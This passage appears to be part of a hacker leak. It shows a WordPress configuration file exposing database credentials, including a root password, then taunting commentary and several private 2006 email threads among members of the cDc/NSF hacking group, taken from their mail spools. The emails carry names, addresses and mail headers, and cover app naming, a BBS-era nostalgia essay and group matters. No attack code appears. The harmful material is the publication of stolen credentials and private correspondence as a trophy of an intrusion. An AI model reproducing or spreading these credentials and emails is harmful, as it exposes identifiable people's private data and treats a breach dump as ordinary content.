MySQL settings ** // -define('DB_NAME', 'oharawordpress'); // The name of the database -define('DB_USER', 'root'); // Your MySQL username -define('DB_PASSWORD', 'p@ssw0rd'); // ...and password ## :( -define('DB_HOST', 'localhost'); // 99% chance you won't need to change -this value -define('DB_CHARSET', 'utf8'); -define('DB_COLLATE', ''); - -// You can have multiple installations in one database if you give each a -unique prefix -$table_prefix = 'nsf_'; // Only numbers, letters, and underscores -please! - -// Change this to localize WordPress. A corresponding MO file for the -// chosen language must be installed to wp-content/languages. -// For example, install de.mo to wp-content/languages and set WPLANG to -'de' -// to enable German language support. -define ('WPLANG', ''); - -/* That's all, stop editing! Happy blogging. */ - -define('ABSPATH', dirname(__FILE__).'/'); -require_once(ABSPATH.'wp-settings.php'); -?> - -~ - -As you can see, there isn't much here apart from a WP and his hardcoded -websites and blogs. Typical. - -We did manage to grab some oldschool mail spools for you though, so you can get -a feel for the day-to-day operations of cdc. This mostly involves talk of -secret handshakes, what to name applications, circle jerks.... - -~ - -Return-Path: -Received: from eastrmimpi02.cox.net ([68.1.16.118]) by eastrmmtai08.cox.net - (InterMail vM.6.01.06.01 201-2131-130-101-20060113) with ESMTP id -<20060816120323.NETG10570.eastrmmtai08.cox.net@eastrmimpi02.cox.net> -for ; Wed, 16 Aug 2006 08:03:23 -0400 -Received: from phoenix.wks.ciphire.local ([217.72.114.248]) by -eastrmimpi02.cox.net with IMP id Abyo1V01F5MdQFM0000000 Wed, 16 Aug 2006 -07:58:50 -0400 -Received: from phoenix.wks.ciphire.local (localhost [127.0.0.1]) by -phoenix.wks.ciphire.local (Postfix) with ESMTP id 7F2DBE40F5 for ; Wed, 16 Aug -2006 14:01:47 +0200 (CEST) -Date: Wed, 16 Aug 2006 14:01:46 +0200 -From: "Mixter" -To: -X-Priority: 3 -X-MSMail-Priority: Normal -Subject: Re: scr00gle? -Message-ID: <20060816140146.0893b707@phoenix.wks.ciphire.local> -X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180 -In-Reply-To: <30410617.1155561613010.JavaMail.root@centrmwml08.mgt.cox.net> -References: <30410617.1155561613010.JavaMail.root@centrmwml08.mgt.cox.net> -X-Mailer: Sylpheed-Claws 2.3.1 (GTK+ 2.8.19; i686-pc-linux-gnu) -MIME-Version: 1.0 -Content-Type: text/plain; - charset="US-ASCII" -Content-Transfer-Encoding: 7bit -X-Ciphire-Security: plain - - -Hi, and sorry for taking so long. - -Hmmm. I'm afraid I can't say much about scr00gle, as I'm on Linux -and my vmware is broken atm (should be fixed these days though), -and also I couldn't find the SOURCE of this anywhere, it contained -just docs and an .exe. Are you aware of where to find the source of -this app, or would the author cooperate with us? As we'd obviously -need it anyhow :) Plus, cross-platform app capability might be cool, too. - -On Mon, 14 Aug 2006 8:20:12 -0500 - wrote: - -> Mixter, I was wondering if you had had an opportunity to check out scr00gle -1.01 yet, and if that was along the lines of what you were thinking for your -app? -> -> http://www.robohara.com/software/scroogle_101.rar -> -> The name scr00gle is already taken, but until I/we/whoever can come up with -another one, I've kept it as the working name. -> -> Rob / Flack, cDc-NSF -> -> PS: Thread in progress here: -> http://www.cultdeadcow.com/sekrut/viewtopic.php?t=256 -> - - -Return-Path: -Received: from fed1rmimpi02.cox.net ([70.169.32.69]) by -fed1rmmtai15.cox.net (InterMail vM.6.01.06.01 -201-2131-130-101-20060113) with ESMTP id -<20060506230141.GUPU12038.fed1rmmtai15.cox.net@fed1rmimpi02.cox.net> -for ; Sat, 6 May 2006 19:01:41 -0400 -Received: from ug-out-1314.google.com ([66.249.92.169]) by fed1rmimpi02.cox.net -with IMP id Vywf1U02e3fEpd60000000 for flack@cox.net; Sat, 06 May 2006 18:56:42 --0400 -Received: by ug-out-1314.google.com with SMTP id y2so1109700uge for ; -Sat, 06 May 2006 16:01:38 -0700 (PDT) -DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; - -h=received:message-id:date:from:sender:to:subject:in-reply-to:mime-version:cont -ent-type:content-transfer-encoding:content-disposition:references:x-google-send -er-auth; -b=khKcvCatyqU6TCdIc/+w0YunKNN9Ua1GMICOXK6yaSiJrZzef9DHRET3imTtbuYK0d3xZRaZl5kY9 -HGP7QLvYYk7jgEN0kx+lmgPoO6Iqy5bxB2Py+DCItrV0RDeyIuwWYA3F8bHexfxe7QRafmuqnOW++Gn -wCEgO1qGGfgUeFM= -Received: by 10.78.17.1 with SMTP id 1mr378478huq; Sat, 06 May 2006 -16:01:38 -0700 (PDT) -Received: by 10.78.57.15 with HTTP; Sat, 6 May 2006 16:01:38 -0700 (PDT) -Message-ID: <14d2d440605061601k7fcb2441p1ed91c8b3de2c00d@mail.gmail.com> -Date: Sat, 6 May 2006 18:01:38 -0500 -X-Priority: 3 -From: "Myles Long" -X-MSMail-Priority: Normal -Sender: -To: -Subject: Re: 405 -- Needs Proofing -X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180 -In-Reply-To: <004a01c67145$b77d4480$0301a8c0@Empire.com> -MIME-Version: 1.0 -Content-Type: text/plain; - format=flowed; - charset="WINDOWS-1252" -Content-Transfer-Encoding: quoted-printable -Content-Disposition: inline -References: <14d2d440605061229p32b1b284jbdded3d934bc767@mail.gmail.com> -<004a01c67145$b77d4480$0301a8c0@Empire.com> -X-Google-Sender-Auth: 73539a56e1ce58af - -i thought it was really good. even though it's about 405, it relates -quite a bit to 806 (and many other area codes, i'm sure). good work, -man. - --steev - -On 5/6/06, flack@cox.net wrote: -> Oh wow, awesome. It's not entirely the article I wanted to write but I th= -ink -> it serves its purpose. I don't know if you can ever completely relate the -> nostalgic feelings of "those days" to people who weren't there, but I tri= -ed. -> -> Rob -> -> ----- Original Message ----- -> From: "Myles Long" -> To: -> Sent: Saturday, May 06, 2006 2:29 PM -> Subject: Re: 405 -- Needs Proofing -> -> -> good work, man. sorry for the lack of a response. i just posted it -> to the site, after having made only minor changes (i think there were -> one or two typos; that's about it). -> -> thanks for writing this. aww yeah. -> -> word. -> -> -steev -> -> On 4/24/06, flack@cox.net wrote: -> > -> > Hello Myles Long, -> > -> > The following is an email sent to you by Flack via your account on s00p= -3r -> > s3krut cDc/NSF/Hacktivismo forum. If this message is spam, contains -> > abusive or other comments you find offensive please contact the webmast= -er -> > of the board at the following address: -> > -> > demonseed@cultdeadcow.com -> > -> > Include this full email (particularly the headers). Please note that th= -e -> > reply address to this email has been set to that of Flack. -> > -> > Message sent to you follows -> > ~~~~~~~~~~~~~~~~~~~~~~~~~~~ -> > -> > Take a gander and see what you think. This has probably been the hardes= -t -> > file I've ever written for a couple of reasons, so if a couple of parts -> > feel forced, that's why. I could use some editing help on this. I know = -I'm -> > holding up the works at this point. Read over it and tell me what you -> > think; any advice at this point is appreciated. -> > -> > Once I've got this under my belt, the next project is getting -> > batch-o-matic ready for release. -> > -> > --- BOF --- -> > -> > There's a feeling of nostalgia I get every time I drive past my old -> > neighborhood, which isn't far from where I live today. Back when I was = -a -> > kid my neighborhood was my entire world. My stomping grounds consisted = -of -> > six connected blocks, surrounded by a creek on two sides and highways o= -n -> > the other two. From sun up to sun down I was free to roam wherever I -> > wished as long as I stayed within the boundaries of my neighborhood. To -> > tell you the truth, I'm not sure going past those boundaries ever even -> > crossed my mind. -> > -> > As you get older, perspectives change. When the kids in the neighborhoo= -d -> > (including myself) turned sixteen we got cars, and our worlds were -> > exponentially expanded. Overnight our old neighborhood went from being = -the -> > coolest place we knew to the most boring place on Earth. Before long al= -l -> > my friends had graduated from high school and moved away. -> > -> > Even though the neighborhood looks different these days, I'll always -> > treasure my memories, not only of the neighborhood and the people who -> > lived there but of all the adventures we had together. No matter how ma= -ny -> > years or miles come between me and that old place, the stories and -> > adventures those of us who grew up there had together will be with me f= -or -> > the rest of my life. -> > -> > The same can be said for those of us who grew up behind computer screen= -s, -> > calling Bulletin Board Systems. Online our neighborhoods were our area -> > codes, lines drawn in the sand for us by Ma Bell. As long as I stayed -> > within those virtual boundaries, I was free to call whomever I wanted. = -The -> > people I met through BBSes and the adventures we had together were very -> > real and a very big part of my childhood. In fact there are lots of peo= -ple -> > I met online 20 years ago that I still talk to today. -> > -> > When it comes to the great BBS era, either you were there or you weren'= -t. -> > If you weren't, well, you missed out on some incredible times. The -> > comradery between users in a local area code will never be matched thro= -ugh -> > the Internet. Like a gang, those of us from the same area code stuck -> > together, ready to take on the world. -> > -> > My area code was 405. -> > -> > 405 wasn't much different than any other area code. It wasn't particula= -rly -> > special or unique in any way. In fact, there's no real reason why 405 -> > deserves a tribute dedicated to it over your own local scene. Many of t= -he -> > stories and ideas that appear here could and probably did apply to your -> > area code as well. Unfortunately as many of us have discovered over the -> > years, despite being one of the most exciting electronic eras of our -> > lives, nobody was taking notes. While there have been attempts at -> > documenting the overall history of BBSes (Jason Scott's BBS Documentary -> > comes to mind), many of the local legends and escapades =96 not just fr= -om -> > 405 but from every area code =96 have all but been erased from existenc= -e. As -> > BBSes were eventually turned off one by one they took their histories w= -ith -> > them. And more than that, some of my strongest memories from those year= -s -> > were things that happened in real life, things that didn't even happen -> > online. And so, if you'll indulge me for a few lines more, I'd like to -> > share with you just a few of my memories from my own noggin about my al= -ma -> > mater =85 405. -> > -> > - -> > -> > Back when I started modeming, there wasn't much of a "scene". For -> > starters, everyone was separated by machine type; the Apple users calle= -d -> > Apple boards, the Commodore users called Commodore boards, the Atari us= -ers -> > called Atari boards, the PC people called PC boards, and so on. Within -> > these groups there were subgroups, the biggest division being between -> > those who trafficked in warez and those who didn't. At least in the ear= -ly -> > days it seemed like boards rarely did both =96 you either ran a warez b= -oard -> > with paltry message areas, or a message board with everything but warez= -. -> > Keep in mind that back then, running a warez BBS meant dropping some -> > serious cash for hardware. Back in the early Commodore days, floppy dri= -ves -> > cost $200 each. You could run a BBS with just one drive, but all your -> > system files on one disk didn't leave much room for games. Plus if you -> > were running in this configuration, people could crash your board simpl= -y -> > by upload files until your disk filled up, preventing the BBS software -> > from writing to disk and locking the whole thing up. To run a serious -> > warez board you needed multiple floppy drives; running three (one for t= -he -> > BBS itself, one for uploads and one for downloads) wasn't unheard of. T= -he -> > really serious guys invested in hard drives. In the late 80's, a 10 meg -> > hard drive for the C64 would set you back over a thousand dollars. -> > -> > As a result of all this separation, 405 (and as I mentioned earlier, al= -l -> > area codes) ended up with "pockets" of users. Imagine them as the kids = -you -> > started kindergarten with and worked your way through elementary school -> > with them at your side. The same people tended to call the same boards, -> > and pretty soon small scenes began to develop. But again, these were -> > mostly divided up by platform (the Commodore scene, the Apple scene, et= -c). -> > In addition, each platform was likely to have multiple scenes, groups o= -f -> > people who never crossed paths. -> > -> > I had some great times within both the Apple and Commodore scenes =96 s= -o -> > much in fact that I've almost finished my first book on the subject =96= - but -> > none of these fractured cells can truly be called the "405 scene". In m= -y -> > opinion, that didn't happen until the early 90's. The main catalyst for -> > this change was the unification of platforms. We all got IBM PCs =96 or -> > rather, for many of us, our parents did. Businessmen across the country -> > were buying PC's with hard drives and modems to keep up in the business -> > world. At night, after those businessmen went to bed, their kids would -> > turn those same machines back on and begin dialing BBSes. -> > -> > - -> > -> > As everyone began gravitating toward the IBM platform, all of our world= -s -> > began meshing together as well. As more people began calling the same -> > boards and the pool of people began to grow, cool things began to happe= -n =96 -> > namely, "like people" began to find each other. As a result, some reall= -y -> > cool things began to happen. -> > -> > One was the birth of TBH405, or simply The Brotherhood. TBH405 was a gr= -oup -> > of people who actively promoted the local scene. TBH405 released -> > scene-related newsletters, ranking local boards and users and keeping -> > people informed as to the "goings-on" of the inner circle, so to speak. -> > Think of it as the cool kids from school, if the cool kids from school = -had -> > had their own club. The coolest thing about The Brotherhood was its wid= -e -> > variety of members and their skills. Sure there were warez hounds, but -> > there were people who were into hacking, and the art scene, and -> > programmers, and all kinds of stuff. If you were a member of The -> > Brotherhood, you were hooked up. -> > -> > TBH405 wasn't the only group in town. Soulz at Zero, often referred to = -as -> > the first themed lit group, was founded by The Stranger and myself in 4= -05. -> > A group of five girls known as TDKEB also had some success with their l= -it -> > packs which consisted of poetry, stories, girly-gossip and in jokes. -> > TBH405 even managed to get their public meeting times published in 2600 -> > Magazine for a while. -> > -> > Like many other area codes, there was always a select few BBSes that ha= -d -> > risen above the local scene and made contact with the outside world. -> > Boards like Scooter Dome and The Plutonium Project kept the rest of the -> > 405 scene stocked with the latest games and applications. Even better w= -as -> > when Street Spydrs (the Razor 1911 WHQ) temporarily relocated to our ar= -ea -> > code. Suddenly the scene locals were being drafted into courier positio= -ns -> > for the megagroup, and local boards were flooded with all the latest -> > warez. -> > -> > Of course my greatest memories of those times weren't about the groups = -or -> > the warez or even the boards themselves, but about the people. Since BB= -S -> > "scenes" normally consisted of people who lived within the same area co= -de, -> > it was not uncommon for those people to meet in real life. Sometimes it -> > was for "business" reasons; back in the early days, due to slow modem -> > speeds it was often quicker to trade software with someone in person th= -an -> > it was to do over the phone lines. There were just as many social event= -s -> > as well =96 BBS Parties, as they were referred to. A local Commodore 64 -> > cracking group I was a member of (the OK Krackers) hosted the first BBS -> > party I ever attended. It was also the first time I ever got drunk. I w= -as -> > 14. Imagine mom's surprise when she picked me up the next morning and -> > found dried puke stuck in my hair and one shoe missing. It was a long -> > night. -> > -> > Over the years I attended dozens of local parties. The Brotherhood had -> > their own official "Gatherings". There were nine or ten of those, each -> > wilder than the last. There was the one where Ozzymandias passed out, f= -ell -> > against a wall and knocked his front tooth out. There was the one where -> > someone ate pink Hostess snacks and managed to vomit pink puke all over -> > someone's living room carpet. There was the one where people were doing -> > shots of Jack Daniels and Pace Picante Sauce. Then there was the Gather= -ing -> > where Yaun-Ti (the founder of TBH405) got so drunk that he forgot where= - he -> > lived, a fact he informed us of after several of us drove him around fo= -r -> > hours on end. -> > -> > The interpersonal relationships that formed during those times were -> > unbreakable, or so we thought. I can remember joking with people that -> > someday our kids might call the same BBSes we called. It seemed like th= -e -> > scene would never die =96 and then practically overnight, it did. -> > -> > In mid-to-late 1994, several of us discovered the Internet. At least fo= -r -> > us this was pre-Web days. The Internet for us consisted of a few FTP si= -tes -> > and IRC. IRC seemed mind blowing to us at the time. For years we'd been -> > limited to chatting with one person at a time, and all of a sudden here -> > you could have hundreds of people talking in the same place. -> > -> > What's funny though, looking back, is that everything we saw that you -> > could do on the Internet we saw as an extension of the BBS world. The -> > Internet was another place you could get warez for your BBS. Using the -> > Internet, you could route mail to and from other boards. If your favori= -te -> > BBS was busy, you could get on the Internet and chat on IRC until the -> > board became available. I don't think we ever realized just how quickly -> > the Internet would squash out little local scene out of existence. But = -it -> > did. It killed them all eventually. Some hung on longer than others, bu= -t -> > eventually as speeds increased and the web blossomed it became evident = -to -> > even the oldest of the old schoolers that there was no stopping the -> > behemoth. -> > -> > Soon, nobody cared what area code you were from because it didn't matte= -r. -> > In that sense the Internet was the great equalizer. Nobody knew your -> > history and nobody cared about your little local groups. The Internet w= -as -> > global, baby. -> > -> > Just like the old neighborhood, I'm still wistful about those old days.= - I -> > try and keep touch with as many of the old group as possible. Anacodia -> > married Tekin and moved to California. False God got on with Dell and -> > lives in Austin. Gatoperro moved to Texas and is now in California, I -> > think. Prong moved to Florida. My buddy Arcane lives outside of Dallas. -> > There are a few of us still left in 405. Violetta Kitten moved out of -> > state and came back. Leperkhan still lives here; his kid's in junior hi= -gh -> > now I think. The Stranger's an elementary schoolteacher somewhere aroun= -d -> > these parts. Black Sunshine's got 14 degrees or something in psychology -> > and sociology and working on her doctorate. Rivas works for a major -> > aeronautical company. I work for a different one. It gets harder and -> > harder to keep track of people. Some you can still catch on IRC. Some h= -ave -> > blogs. Some I get an e-mail from a couple of times a year. Some -> > disappeared completely. -> > -> > At least one died; Ghost in the Machine passed away several years ago. = -It -> > was a strange way to reunite the old gang one last time. In one small, -> > dingy church sat most of the major players from the old 405 scene. Look= -ing -> > around the room I saw people I'd cracked password files with, people I'= -d -> > hacked ISP accounts with, people I'd gone to concerts with, people I'd -> > drank too much and passed out with, all sitting around wearing ties, -> > trying to look at least semi-respectable. That was the last time I saw -> > most of the old crew; at a funeral, of all places. -> > -> > - -> > -> > This past weekend, my old neighborhood had their annual garage sale -> > weekend. It's weird going back there a generation later, as so much stu= -ff -> > has changed. The old creek I used to play army in was paved long ago an= -d -> > surrounded by a chain-link fence shortly after. The field I used to pla= -y -> > football in has a house on it. Our old dirt bike track is now home to a= -n -> > official softball field. There are other parts of the neighborhood that -> > still look the same. The willow tree under the streetlight across the -> > street from my old house is still there. The view out my father's bay -> > window looks the same as it did 20 years ago. -> > -> > The old BBS landscape, however, is gone forever. The disks have been -> > thrown away, or were formatted, or simply rotted over time. In my garag= -e I -> > have 3-ring-binders full of old printed out user lists and text files, = -the -> > ink of which has faded over the years. I hang on to old spiral notebook= -s -> > filled with names, passwords and phone numbers, but the more time goes = -by -> > the less familiar the notes look. I recognize the handwriting as my own= -, -> > but the meaning behind some of the notes gets more cryptic each year. -> > -> > Even some of the stories have begun to fade from my human brain. "Remem= -ber -> > when we =85" someone's story will start, and I'll think to myself =85 "= -no, I -> > don't." Maybe it'll sound familiar, maybe it won't. With no written -> > documentation, I find that many of the stories are different depending = -on -> > who's telling them. -> > -> > Rose-colored glasses or not, I'll always think back to the old BBS days= - as -> > some of the greatest times of my life. The files, the games, the disks, -> > the accounts, even the boards themselves are all gone, but the memories= -, -> > the adventures, the fun times =85 they'll always be with me. -> > -> > Here's to ya, 405. -> > -> > --- EOF --- -> > -> > Rob -> > -> - -Return-Path: -Received: from fed1rmimpi01.cox.net ([70.169.32.68]) by -fed1rmmtai19.cox.net (InterMail vM.6.01.05.02 -201-2131-123-102-20050715) with ESMTP id -<20060126011449.UHUA3923.fed1rmmtai19.cox.net@fed1rmimpi01.cox.net> -for ; Wed, 25 Jan 2006 20:14:49 -0500 -Received: from web34208.mail.mud.yahoo.com ([66.163.178.123]) by -fed1rmimpi01.cox.net with IMP id pdCv1T02Q2g7tYq0000000 for flack@cox.net; Wed, -25 Jan 2006 20:12:57 -0500 -Received: (qmail 33048 invoked by uid 60001); 26 Jan 2006 01:16:48 -0000 -DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; -h=Message-ID:Received:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Typ -e:Content-Transfer-Encoding; -b=qAO1mi3iiD32bvfYTqqpl77MhWaIYWnfHchGrEU0jVdm9LKKD3l/sARO/jr934RQ/1/sdu0Q0+w7f -uLvzhNDf/3hXgXKPwKNrvTNzNPYNfjaEbV7UCjycW/CfcTfFckImFu5OrzJaYT47BBQlDE+qXLRL4fC -KsCMh04iQvuLXFc= ; -Message-ID: <20060126011648.33046.qmail@web34208.mail.mud.yahoo.com> -Received: from [66.65.10.45] by web34208.mail.mud.yahoo.com via HTTP; Wed, 25 -Jan 2006 17:16:48 PST -X-Priority: 3 -X-MSMail-Priority: Normal -Date: Wed, 25 Jan 2006 17:16:48 -0800 (PST) -From: "Grandmaster Ratte'" -Subject: Re: cdc-nsf site - beta online -X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180 -To: -In-Reply-To: <20060125192234.PWUM5868.centrmmtao05.cox.net@[172.18.53.8]> -MIME-Version: 1.0 -Content-Type: text/plain; - charset="iso-8859-1" -Content-Transfer-Encoding: 7bit - -Looks really good - totally dig the graphics and colors and ninja themed -stuff. Quick work, too! - -Sorry, I've had my head down this week buried in trading stuff - difficulties -have arisen. Myles can do adminy stuff better & faster than I can if you -need any of that. Me, I just got opinions (ha). - -Anyway, looking forward to the other guys taking a gander at it. I'm sure -they'll be stoked. This a great example of what I'm the most happy to see -with NSF stuff - someone sensing a need and just filling it w/out a whole lot -of committee chatter and whatnot. Awesome. - -k3v - ---- flack@cox.net wrote: - -> Still working on some (a lot) of the graphics and features. Random pic -> directory is now working. Setting up different bloggers is simple. -> -> After fighting with my isp I got them to add another db for free so I moved -> all the hosting and db back to my site for now. -> -> http://www.robohara.com/nsf -> -> Any input, etc, always appreciated. Once I tweak for another day or two -> I'll post it up in the cDc forum for input. -> -> Rob -> -> - -Return-Path: -Received: from centrmimpi01.cox.net ([68.111.106.84]) by -centrmmtai07.cox.net (InterMail vM.6.01.06.01 -201-2131-130-101-20060113) with ESMTP id -<20060803162151.GISZ22269.centrmmtai07.cox.net@centrmimpi01.cox.net> -for ; Thu, 3 Aug 2006 12:21:51 -0400 -Received: from wr-out-0506.google.com ([64.233.184.236]) by -centrmimpi01.cox.net with IMP id 5UGs1V00c56SlvC0000000 for flack@cox.net; Thu, -03 Aug 2006 12:16:54 -0400 -Received: by wr-out-0506.google.com with SMTP id 71so468802wri for ; -Thu, 03 Aug 2006 09:21:49 -0700 (PDT) -DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; - -h=received:message-id:date:from:sender:to:subject:in-reply-to:mime-version:cont -ent-type:content-transfer-encoding:content-disposition:references:x-google-send -er-auth; -b=RCl0I0rher+NauD+7ImP+cTHUMmcEUK4x0l3PnF+zcQCKZuSU9QQfYYohdTU3LBeoBGtCtiVZwbvt -lqdLshSFkI6DcdFyk0cRrQgpK5jNSKI16pgQrs+VP4bRx1qZNixqg9OnVbh37y++6lx0QQvayZSLuvi -wEQ8A0Jdd8Ot+9c= -Received: by 10.78.116.19 with SMTP id o19mr792475huc; Thu, 03 Aug 2006 -09:21:49 -0700 (PDT) -Received: by 10.78.143.7 with HTTP; Thu, 3 Aug 2006 09:21:49 -0700 (PDT) -Message-ID: <14d2d440608030921h75f0eb8dl5b198bcf55ab40e7@mail.gmail.com> -X-Priority: 3 -Date: Thu, 3 Aug 2006 11:21:49 -0500 -X-MSMail-Priority: Normal -From: "Myles Long" -Sender: -To: -X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180 -Subject: Re: b0m -In-Reply-To: <28117526.1154621696939.JavaMail.root@centrmwml01.mgt.cox.net> -MIME-Version: 1.0 -Content-Type: text/plain; - format=flowed; - charset="ISO-8859-1" -Content-Transfer-Encoding: 7bit -Content-Disposition: inline -References: <28117526.1154621696939.JavaMail.root@centrmwml01.mgt.cox.net> -X-Google-Sender-Auth: e0185e07296fc22c - -> What's the best way to title my app for cDc? - -That's a really good question... - -> Right now in the title bar I have: "batch-0-matic 1.0 - (c) 2006 -Flack/cDc-NSF" - -That looks good to me. Including "cDc" is key, and including NSF -works, too; it'll help differentiate the NSF from the CULT, but make -it clear that it's still part of the overall cDc (because cDc <> CULT, -though that's the confusion). - -> Would it be preferrable to remove my name, drop the NSF, etc? Doesn't matter -to me, -> just looking for the standard (?). Also, speaking of standards, any preferred -format for -> documentation? In the past I've always done HTML but I could do plain txt or -something -> else (?). - -As far as I know, there aren't standards for this stuff, though there -probably should be. Maybe not put the copyright info in the titlebar? - Maybe in an about screen or on a splash screen? I dunno, either way -is cool. We should establish some sort of uniformity to branding -cDc-related apps; since I'm lazy, I'll just declare that whatever you -do is the de facto standard. Heh. - -> A week or so ago Kevin sent out an e-mail requesting someone code a Google -> Hacking/Query app. I plan on having a proof of concept done by the end of -this weekend. - -That's something that Mixter was working on/was going to work on; I -don't know the details about what all, if anything, he's done besides -conceptualize. That's not to say that you shouldn't work on it; in -fact, you definitely should. Proof of concept is a key point in -moving this forward, and this could be huge if we play it right. I've -found, as I think you and I have discussed before, that lots of -cDc-related people are big on ideas and small on follow-through. So, -yeah, go for it, then we can either fold it and Mixter's deal together -or we can call for help on yours or whatever. Long story short, great -idea, can't wait to see it. - --steev - -Return-Path: -Received: from fed1rmimpi01.cox.net ([70.169.32.68]) by -fed1rmmtai14.cox.net (InterMail vM.6.01.06.01 -201-2131-130-101-20060113) with ESMTP id -<20060820232422.LCOU23661.fed1rmmtai14.cox.net@fed1rmimpi01.cox.net> -for ; Sun, 20 Aug 2006 19:24:22 -0400 -Received: from py-out-1112.google.com ([64.233.166.183]) by -fed1rmimpi01.cox.net with IMP id CPG71V02R3xkgLG0000000 Sun, 20 Aug 2006 -19:16:09 -0400 -Received: by py-out-1112.google.com with SMTP id z59so977048pyg for ; -Sun, 20 Aug 2006 16:24:19 -0700 (PDT) -DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; - -h=received:message-id:date:from:sender:to:subject:in-reply-to:mime-version:cont -ent-type:content-transfer-encoding:content-disposition:references:x-google-send -er-auth; -b=BvalRNpgFWg2eblZB59X41B2lFC/iFIAZkgZovC/0kbLc7QADLAJfwvxn0XnuVfg4k46AXdoolOpi -CsMULCCpcWItzY9RsCsfDdJf+Ie8F3TnEtRNnUXE6R826YQb+EnBUYflgVkehEtswXxDfh8wWVIm5TM -Z2Ovdt+EBaAAe8g= -Received: by 10.64.185.7 with SMTP id i7mr6008834qbf; Sun, 20 Aug 2006 -16:24:19 -0700 (PDT) -Received: by 10.64.243.6 with HTTP; Sun, 20 Aug 2006 16:24:19 -0700 (PDT) -Message-ID: <14d2d440608201624m607309d3t4a81debf9824ece6@mail.gmail.com> -X-Priority: 3 -X-MSMail-Priority: Normal -Date: Sun, 20 Aug 2006 18:24:19 -0500 -From: "Myles Long" -Sender: -X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180 -To: -Subject: Re: youtube -In-Reply-To: <000801c6b770$d8516170$0401a8c0@Empire.com> -MIME-Version: 1.0 -Content-Type: text/plain; - format=flowed; - charset="ISO-8859-1" -Content-Transfer-Encoding: 7bit -Content-Disposition: inline -References: <11893955.1154640056011.JavaMail.root@centrmwml01.mgt.cox.net> -<14d2d440608031744r77682ddcn76f237ecb185f2b0@mail.gmail.com> -<000801c6b770$d8516170$0401a8c0@Empire.com> -X-Google-Sender-Auth: 9b9f592bd215936c - -Sorry for the delayed reply, I'm really quite a slow ass. I hope my -recent pimping of your book will help make up for my slowness. Check -this out: - -http://www.cultdeadcow.com/archives/2006/08/commodork.php3 -http://www.cultdeadcow.com/cms/fashion.php3 - -> Hey, you didn't bug me too much about the app -- I was just dragging my -> feet. For a long time I lost the original source code, and then when I found -> it I didn't have vb installed on my laptop any more. So it's been kind of a -> back burner kind of thing. - -Cool, I just worry that I get overzealous about this stuff at times. -The app is still gonna come out, you've got my word on that. Probably -Tuesday or Wednesday; I try to limit my blog posting to one per day, -and tomorrow's probably going to be the cDc book. There are some -graphics and t-files and audio ready, too. I'll hit G.Ratte' up in a -minute and try to get a firm date. - -> You know, to tell you the truth I kind of lost interest in the whole cDc -> thing for a bit. We've talked about this before, but I just had this -> misperception that there would be like, you know, weekly meetings and secret -> handshakes or something, where we would all get together and work on - -Yeah, I know what you mean. I've gone through several periods of -loss-of-interest in cDc stuff. I'm glad you're back, though. It's -all about having people such as yourself that actually do stuff. - -As for secret handshakes, that we do have (really). Check this out: - -http://www.cultdeadcow.com/pics/2006_defcon_14/Gratte_mudge.JPG - -That's the first secret handshake; one person puts his/her arms around -another person with the hands in the position that Mudge's hands are -in, then the second person milks the thumbs as if they were udders. I -guess it's not that secret, since there's a picture of it on the web, -hah. There's a second secret handshake that I can't remember right -now. - -> projects. I'm sure you remember my initial frustrations on the lack of -> organization in the beginning. That's the main reason I kind of blew off my -> plans to go to Defcon. But over the past few weeks, it's like people have - -Yeah, people come together around the cons and shit gets done. In -between cons, though, not much happens. We try to keep things afloat -with t-files and stuff, but the con-stuff is pretty much when it -happens. That's not always true; Oxblood's got his stuff with the -Dalai Lama and whatnot that keeps us in the news (especially lately), -but for the most part, it's the silly hacker cons that are our "bread -and butter," doing-stuff-wise (and media-wise). I guess it's because -we sort of a have a captive audience at the cons; it's people who are -definitely interested in our stuff, for the most part, and the media -shows up, too. I'm not saying this is the way it should be, but this -is the way that it has always been, in my experience. - -> started coming together. I think I see cDc as less of a cohesive group and -> more of just a think tank of cool people. I think I was waiting for other -> people to do cool stuff all this time and I finally see that it's not like -> that, it's more about doing stuff on your own and getting help/support with - -Yeah, cDc is not really a cohesive group with real goals or anything -like that. It's really just a brand in search of a product; the group -(the name, really) is symbiotic with its various members. People do -stuff, put cDc's name on it, get more notice than they were likely to -have gotten if they'd self-released it. In turn, the brand is -strengthened. It's a cool concept when there's stuff going on, -otherwise it canbe frustrating. Definitely the think tank idea is -something we're trying to promote, as well. - -> those projects. At least that's what I think right now, heh. The Flack man's -> opinion is always subject to change, haha. - -Hah, yeah, that's the way it should be. Things are pretty good, -cDc-wise, right now, but I'm not sure that I'll always think that's -true. I get tired of being the only one posting on the main blog, for -instance, especially given that there are 20ish others with posting -access. Well, Krass Katt posts sometimes, but she's the exception -lately...anyway, I ramble. Things are pretty good, but shit happens -and people move in and out of the "cDc circle" or whatever and things -can change. Hopefully things will stay good, but there are never any -guarantees. We need to milk (hah) this recent media attention, which -we've done a reasonable job of so far, but it needs to continue. G. -Ratte' told me that the word on the street at HOPE was that a lot of -the younger kids don't know who we are anymore; that was kind of -shocking, but I believe it. Ever onward, though, gotta keep it -poppin' fresh. Heh. - -> I am honored to have the cDc badge on batch-0-matic. It's pretty cool to -> think that people might download it and use it in ways I never even thought -> of. That would be awesome. - -Yeah, that'd be rad. That's the whole symbiotic brand-thing. We (the -group, collectively) hype your project and in turn hype ourselves. I -really am pushing for this to get released; sorry it's been a bit of a -delay on my part. The whole Defcon thing happened, then there was the -stuff about Tibet and whatnot, and then I've been actually busy at -work for the past week (work is where I usually do cDc stuff), but I'm -pushing to get it out ASAP. - -> Cool deal on the cDc book. I kind of got pushed into a time crunch and had -> to order 30 copies right off the bat before ordering one print copy in -> advance. I know it's a gamble but I plan on debuting it August 19th at OVGE -> (a local videogame exhibition) and I don't have time for two rounds of -> printing/shipping before then. After the debut I'll start pushing it online -> and stuff. I read a quip that said the average self-published book sells -> about 200 copies. I don't want to get my hopes up, but that seems pretty -> low. - -Yeah, 200 seems low. Still, 200 copies is decent. I'm thinking that, -if I sell enough copies of the 